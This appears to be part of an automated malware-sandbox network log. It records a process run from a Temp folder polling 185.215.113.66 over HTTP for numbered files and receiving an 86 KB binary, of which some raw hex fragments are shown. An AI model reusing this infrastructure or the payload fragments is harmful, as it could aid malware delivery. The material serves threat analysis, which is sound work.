Apr 24, 2024 10:08:46.113405943 CEST	1289	IN	Data Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9 Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut\|.G%umnnfE~dT=D-%7}=]V#+W$Bh
Apr 24, 2024 10:08:46.467940092 CEST	1289	IN	Data Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49744	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:08:48.481939077 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:08:48.816747904 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:08:48 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49745	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:08:51.186669111 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:08:51.522084951 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:08:51 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49746	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:08:53.891180038 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:08:54.222799063 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:08:54 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49748	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:08:57.672339916 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:08:58.008332014 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:08:57 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49749	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:09:00.391463041 CEST	166	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:09:00.726875067 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:09:00 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49767	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:10:17.043627977 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:10:17.378603935 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:10:17 GMT Content-Type: application/octet-stream Content-Length: 86272 Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT Connection: keep-alive ETag: "662824e8-15100" Accept-Ranges: bytes Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78 Data Ascii: JM%O;hb>q\|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD\|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb \|Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z!U2;}`Iy2&`h[~W1z[bb7ox
Apr 24, 2024 10:10:17.378703117 CEST	1289	IN	Data Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
Apr 24, 2024 10:10:17.378834963 CEST	1289	IN	Data Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
Apr 24, 2024 10:10:17.378910065 CEST	1289	IN	Data Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#\|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
Apr 24, 2024 10:10:17.378927946 CEST	1289	IN	Data Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52 Data Ascii: hi\|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
